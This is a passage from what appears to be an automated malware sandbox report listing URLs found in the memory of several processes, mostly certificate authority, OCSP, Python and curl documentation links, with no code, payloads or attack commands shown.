00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: explorer.exe, 00000003.00000003.3094406378.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: tmp8AEF.exe, 00000006.00000003.2247224120.0000024B41D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
      Source: tmp8AEF.exe, 00000006.00000003.2247224120.0000024B41D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic:
      Source: tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: explorer.exe, 00000003.00000002.3335969864.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2103838610.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
      Source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: explorer.exe, 00000003.00000003.3094406378.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: explorer.exe, 00000003.00000003.3094406378.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
      Source: explorer.exe, 00000003.00000003.3094406378.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://ocsp.digicert.com0N
      Source: explorer.exe, 00000003.00000002.3343563900.00000000099BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://ocsp.thawte.com0
      Source: tmp8AEF.exe, 00000009.00000002.2285358677.00007FF8A8DFD000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
      Source: explorer.exe, 00000003.00000002.3342356971.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2112187028.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2112881693.0000000008890000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
      Source: tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
      Source: tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
      Source: explorer.exe, 00000003.00000003.2691930896.000000000C8ED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/auto
      Source: explorer.exe, 00000003.00000000.2118670983.000000000C891000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoA
      Source: tmp8AEF.exe, 00000006.00000003.2255370339.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2281772785.000002E4B9C70000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283914554.000002E4B9C7C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282198812.000002E4B9C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
      Source: tmp8AEF.exe, 00000009.00000003.2280679574.000002E4B9C74000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2280711426.000002E4B9C68000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2284411794.000002E4BBBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
      Source: tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drString found in binary or memory: http://www.winimage.com/zLibDll
      Source: tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drString found in binary or memory: http://www.winimage.com/zLibDll1.3.1-wbr
      Source: explorer.exe, 00000003.00000000.2117173710.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096617863.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3349612496.000000000C54A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000003.00000000.2106502490.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3339715609.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000003.00000000.2113623641.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000003.00000002.3339715609.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2106502490.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000003.00000002.3337758114.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2104977564.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
      Source: tmp1946.exe, tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drString found in binary or memory: https://curl.se/docs/alt-svc.html
      Source: tmp1946.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
      Source: tmp1946.exe, tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drString found in binary or memory: https://curl.se/docs/hsts.html
      Source: tmp1946.exeString found in binary or memory: https://curl.se/docs/hsts.html#
      Source: tmp1946.exe, tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drString found in binary or memory: https://curl.se/docs/http-cookies.html
      Source: tmp1946.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
      Source: explorer.exe, 00000003.00000003.3094406378.0000000009B7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009B7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: tmp8AEF.exe, 00000009.00000003.2281953921.000002E4B9BC0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283820341.000002E4B9C57000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282844715.000002E4B9BE0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283743849.000002E4B9BE1000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282767428.000002E4B9C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
      Source: tmp8AEF.exe, 00000009.00000002.2284008198.000002E4BB870000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
      Source: tmp8AEF.exe, 00000009.00000003.2282767428.000002E4B9C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
      Source: tmp8AEF.exe, 00000009.00000003.2281953921.000002E4B9BC0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283820341.000002E4B9C57000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282844715.000002E4B9BE0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283743849.000002E4B9BE1000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282767428.000002E4B9C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
